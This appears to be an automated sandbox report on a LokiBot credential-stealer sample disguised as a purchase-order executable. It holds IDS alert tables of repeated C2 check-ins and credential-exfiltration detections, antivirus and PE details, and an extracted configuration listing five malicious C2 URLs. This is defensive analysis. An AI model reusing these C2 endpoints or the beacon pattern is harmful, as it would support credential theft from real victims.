2024-10-24T17:03:40.811483+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50036	188.114.96.3	80	TCP
2024-10-24T17:03:43.222325+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50037	188.114.96.3	80	TCP
2024-10-24T17:03:44.266809+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50038	188.114.96.3	80	TCP
2024-10-24T17:03:45.899764+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50039	188.114.96.3	80	TCP
2024-10-24T17:03:49.447135+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50040	188.114.96.3	80	TCP
2024-10-24T17:03:51.258797+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50041	188.114.96.3	80	TCP
2024-10-24T17:03:52.944528+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50042	188.114.96.3	80	TCP
2024-10-24T17:03:56.758959+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50043	188.114.96.3	80	TCP
2024-10-24T17:03:58.362070+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50044	188.114.96.3	80	TCP
2024-10-24T17:04:03.635176+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50045	188.114.96.3	80	TCP
2024-10-24T17:04:04.695816+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50046	188.114.96.3	80	TCP
2024-10-24T17:04:06.227709+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50047	188.114.96.3	80	TCP
2024-10-24T17:04:07.732122+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50048	188.114.96.3	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T17:02:06.733299+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49704	188.114.96.3	80	TCP
2024-10-24T17:02:07.830536+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49705	188.114.96.3	80	TCP
2024-10-24T17:02:08.934078+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49706	188.114.96.3	80	TCP
2024-10-24T17:02:10.185322+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49707	188.114.96.3	80	TCP
2024-10-24T17:02:11.235526+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49708	188.114.96.3	80	TCP
2024-10-24T17:02:12.361135+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49709	188.114.96.3	80	TCP
2024-10-24T17:02:13.549321+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49710	188.114.96.3	80	TCP
2024-10-24T17:02:17.079419+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49717	188.114.96.3	80	TCP
2024-10-24T17:02:20.619456+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49735	188.114.96.3	80	TCP
2024-10-24T17:02:21.691587+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49745	188.114.96.3	80	TCP
2024-10-24T17:02:23.211146+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49757	188.114.96.3	80	TCP
2024-10-24T17:02:24.561675+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49763	188.114.96.3	80	TCP
2024-10-24T17:02:25.747925+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49774	188.114.96.3	80	TCP
2024-10-24T17:02:26.794870+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49780	188.114.96.3	80	TCP
2024-10-24T17:02:27.825461+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49786	188.114.96.3	80	TCP
2024-10-24T17:02:28.879212+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49792	188.114.96.3	80	TCP
2024-10-24T17:02:29.936630+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49798	188.114.96.3	80	TCP
2024-10-24T17:02:31.015360+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49806	188.114.96.3	80	TCP
2024-10-24T17:02:33.298933+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49820	188.114.96.3	80	TCP
2024-10-24T17:02:34.372256+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49826	188.114.96.3	80	TCP
2024-10-24T17:02:35.421423+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49832	188.114.96.3	80	TCP
2024-10-24T17:02:37.545568+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49845	188.114.96.3	80	TCP
2024-10-24T17:02:38.638011+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49853	188.114.96.3	80	TCP
2024-10-24T17:02:39.658318+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49859	188.114.96.3	80	TCP
2024-10-24T17:02:40.998847+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49866	188.114.96.3	80	TCP
2024-10-24T17:02:42.218170+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49875	188.114.96.3	80	TCP
2024-10-24T17:02:43.317732+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49881	188.114.96.3	80	TCP
2024-10-24T17:02:45.544944+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49893	188.114.96.3	80	TCP
2024-10-24T17:02:46.580422+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49899	188.114.96.3	80	TCP
2024-10-24T17:02:47.796961+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49907	188.114.96.3	80	TCP
2024-10-24T17:02:51.046250+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49925	188.114.96.3	80	TCP
2024-10-24T17:02:53.656102+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49941	188.114.96.3	80	TCP
2024-10-24T17:02:58.245581+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49963	188.114.96.3	80	TCP
2024-10-24T17:02:59.443401+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49968	188.114.96.3	80	TCP
2024-10-24T17:03:00.546134+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49972	188.114.96.3	80	TCP
2024-10-24T17:03:01.672985+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49976	188.114.96.3	80	TCP
2024-10-24T17:03:04.124054+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49980	188.114.96.3	80	TCP
2024-10-24T17:03:05.169370+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49983	188.114.96.3	80	TCP
2024-10-24T17:03:06.232216+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49987	188.114.96.3	80	TCP
2024-10-24T17:03:07.418539+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49990	188.114.96.3	80	TCP
2024-10-24T17:03:08.919860+0200	2021641	1	A Network Trojan was detected	192.168.2.5	49995	188.114.96.3	80	TCP
2024-10-24T17:03:11.777745+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50002	188.114.96.3	80	TCP
2024-10-24T17:03:15.310031+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50010	188.114.96.3	80	TCP
2024-10-24T17:03:16.352682+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50013	188.114.96.3	80	TCP
2024-10-24T17:03:17.420331+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50019	188.114.96.3	80	TCP
2024-10-24T17:03:18.620369+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50022	188.114.96.3	80	TCP
2024-10-24T17:03:19.829825+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50023	188.114.96.3	80	TCP
2024-10-24T17:03:20.922651+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50024	188.114.96.3	80	TCP
2024-10-24T17:03:21.973153+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50025	188.114.96.3	80	TCP
2024-10-24T17:03:23.325611+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50026	188.114.96.3	80	TCP
2024-10-24T17:03:24.421552+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50027	188.114.96.3	80	TCP
2024-10-24T17:03:26.571665+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50028	188.114.96.3	80	TCP
2024-10-24T17:03:29.956285+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50029	188.114.96.3	80	TCP
2024-10-24T17:03:31.134751+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50030	188.114.96.3	80	TCP
2024-10-24T17:03:32.261893+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50031	188.114.96.3	80	TCP
2024-10-24T17:03:33.465689+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50032	188.114.96.3	80	TCP
2024-10-24T17:03:35.059300+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50033	188.114.96.3	80	TCP
2024-10-24T17:03:36.887347+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50034	188.114.96.3	80	TCP
2024-10-24T17:03:38.921832+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50035	188.114.96.3	80	TCP
2024-10-24T17:03:40.811483+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50036	188.114.96.3	80	TCP
2024-10-24T17:03:41.883240+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50037	188.114.96.3	80	TCP
2024-10-24T17:03:43.376184+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50038	188.114.96.3	80	TCP
2024-10-24T17:03:44.476668+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50039	188.114.96.3	80	TCP
2024-10-24T17:03:46.083585+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50040	188.114.96.3	80	TCP
2024-10-24T17:03:49.605447+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50041	188.114.96.3	80	TCP
2024-10-24T17:03:51.419744+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50042	188.114.96.3	80	TCP
2024-10-24T17:03:53.091767+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50043	188.114.96.3	80	TCP
2024-10-24T17:03:56.917338+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50044	188.114.96.3	80	TCP
2024-10-24T17:03:58.513507+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50045	188.114.96.3	80	TCP
2024-10-24T17:04:03.807044+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50046	188.114.96.3	80	TCP
2024-10-24T17:04:04.868950+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50047	188.114.96.3	80	TCP
2024-10-24T17:04:06.395715+0200	2021641	1	A Network Trojan was detected	192.168.2.5	50048	188.114.96.3	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T17:02:06.733299+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49704	188.114.96.3	80	TCP
2024-10-24T17:02:07.830536+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49705	188.114.96.3	80	TCP
2024-10-24T17:02:08.934078+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49706	188.114.96.3	80	TCP
2024-10-24T17:02:10.185322+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49707	188.114.96.3	80	TCP
2024-10-24T17:02:11.235526+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49708	188.114.96.3	80	TCP
2024-10-24T17:02:12.361135+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49709	188.114.96.3	80	TCP
2024-10-24T17:02:13.549321+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49710	188.114.96.3	80	TCP
2024-10-24T17:02:17.079419+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49717	188.114.96.3	80	TCP
2024-10-24T17:02:20.619456+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49735	188.114.96.3	80	TCP
2024-10-24T17:02:21.691587+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49745	188.114.96.3	80	TCP
2024-10-24T17:02:23.211146+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49757	188.114.96.3	80	TCP
2024-10-24T17:02:24.561675+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49763	188.114.96.3	80	TCP
2024-10-24T17:02:25.747925+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49774	188.114.96.3	80	TCP
2024-10-24T17:02:26.794870+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49780	188.114.96.3	80	TCP
2024-10-24T17:02:27.825461+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49786	188.114.96.3	80	TCP
2024-10-24T17:02:28.879212+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49792	188.114.96.3	80	TCP
2024-10-24T17:02:29.936630+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49798	188.114.96.3	80	TCP
2024-10-24T17:02:31.015360+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49806	188.114.96.3	80	TCP
2024-10-24T17:02:33.298933+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49820	188.114.96.3	80	TCP
2024-10-24T17:02:34.372256+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49826	188.114.96.3	80	TCP
2024-10-24T17:02:35.421423+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49832	188.114.96.3	80	TCP
2024-10-24T17:02:37.545568+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49845	188.114.96.3	80	TCP
2024-10-24T17:02:38.638011+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49853	188.114.96.3	80	TCP
2024-10-24T17:02:39.658318+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49859	188.114.96.3	80	TCP
2024-10-24T17:02:40.998847+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49866	188.114.96.3	80	TCP
2024-10-24T17:02:42.218170+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49875	188.114.96.3	80	TCP
2024-10-24T17:02:43.317732+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49881	188.114.96.3	80	TCP
2024-10-24T17:02:45.544944+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49893	188.114.96.3	80	TCP
2024-10-24T17:02:46.580422+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49899	188.114.96.3	80	TCP
2024-10-24T17:02:47.796961+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49907	188.114.96.3	80	TCP
2024-10-24T17:02:51.046250+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49925	188.114.96.3	80	TCP
2024-10-24T17:02:53.656102+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49941	188.114.96.3	80	TCP
2024-10-24T17:02:58.245581+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49963	188.114.96.3	80	TCP
2024-10-24T17:02:59.443401+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49968	188.114.96.3	80	TCP
2024-10-24T17:03:00.546134+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49972	188.114.96.3	80	TCP
2024-10-24T17:03:01.672985+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49976	188.114.96.3	80	TCP
2024-10-24T17:03:04.124054+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49980	188.114.96.3	80	TCP
2024-10-24T17:03:05.169370+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49983	188.114.96.3	80	TCP
2024-10-24T17:03:06.232216+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49987	188.114.96.3	80	TCP
2024-10-24T17:03:07.418539+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49990	188.114.96.3	80	TCP
2024-10-24T17:03:08.919860+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49995	188.114.96.3	80	TCP
2024-10-24T17:03:11.777745+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50002	188.114.96.3	80	TCP
2024-10-24T17:03:15.310031+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50010	188.114.96.3	80	TCP
2024-10-24T17:03:16.352682+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50013	188.114.96.3	80	TCP
2024-10-24T17:03:17.420331+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50019	188.114.96.3	80	TCP
2024-10-24T17:03:18.620369+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50022	188.114.96.3	80	TCP
2024-10-24T17:03:19.829825+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50023	188.114.96.3	80	TCP
2024-10-24T17:03:20.922651+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50024	188.114.96.3	80	TCP
2024-10-24T17:03:21.973153+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50025	188.114.96.3	80	TCP
2024-10-24T17:03:23.325611+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50026	188.114.96.3	80	TCP
2024-10-24T17:03:24.421552+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50027	188.114.96.3	80	TCP
2024-10-24T17:03:26.571665+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50028	188.114.96.3	80	TCP
2024-10-24T17:03:29.956285+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50029	188.114.96.3	80	TCP
2024-10-24T17:03:31.134751+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50030	188.114.96.3	80	TCP
2024-10-24T17:03:32.261893+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50031	188.114.96.3	80	TCP
2024-10-24T17:03:33.465689+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50032	188.114.96.3	80	TCP
2024-10-24T17:03:35.059300+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50033	188.114.96.3	80	TCP
2024-10-24T17:03:36.887347+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50034	188.114.96.3	80	TCP
2024-10-24T17:03:38.921832+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50035	188.114.96.3	80	TCP
2024-10-24T17:03:40.811483+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50036	188.114.96.3	80	TCP
2024-10-24T17:03:41.883240+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50037	188.114.96.3	80	TCP
2024-10-24T17:03:43.376184+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50038	188.114.96.3	80	TCP
2024-10-24T17:03:44.476668+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50039	188.114.96.3	80	TCP
2024-10-24T17:03:46.083585+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50040	188.114.96.3	80	TCP
2024-10-24T17:03:49.605447+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50041	188.114.96.3	80	TCP
2024-10-24T17:03:51.419744+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50042	188.114.96.3	80	TCP
2024-10-24T17:03:53.091767+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50043	188.114.96.3	80	TCP
2024-10-24T17:03:56.917338+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50044	188.114.96.3	80	TCP
2024-10-24T17:03:58.513507+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50045	188.114.96.3	80	TCP
2024-10-24T17:04:03.807044+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50046	188.114.96.3	80	TCP
2024-10-24T17:04:04.868950+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50047	188.114.96.3	80	TCP
2024-10-24T17:04:06.395715+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50048	188.114.96.3	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: rPedidodecompra__PO20441__ARIMComponentes.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dddotx.shop/Mine/PWS/fre.php"]}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: rPedidodecompra__PO20441__ARIMComponentes.exe

Joe Sandbox ML: detected

Source: rPedidodecompra__PO20441__ARIMComponentes.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: rPedidodecompra__PO20441__ARIMComponentes.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: BATMAN.pdbxD source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115259335.0000000002F10000.00000004.08000000.00040000.00000000.sdmp, rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115300674.0000000003041000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: WindowsFormsApp1.pdb source: rPedidodecompra__PO20441__ARIMComponentes.exe
Source:	Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3328577920.00000000009C2000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: BATMAN.pdb source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115259335.0000000002F10000.00000004.08000000.00040000.00000000.sdmp, rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115300674.0000000003041000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

2_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49757 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49708 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49708 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49704 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49706 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49706 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49706 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49735 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49735 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49709 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49709 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49717 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49704 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49717 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49705 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49717 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49705 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49705 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49786 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49774 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49774 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49717 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49709 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49717 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49708 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49704 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49709 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49709 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49792 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49708 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49792 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49708 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49792 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49774 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49735 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49853 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49774 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49774 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49706 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49763 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49705 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49875 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49893 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49893 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49717
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49893 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49704 -> 188.114.96.3:80
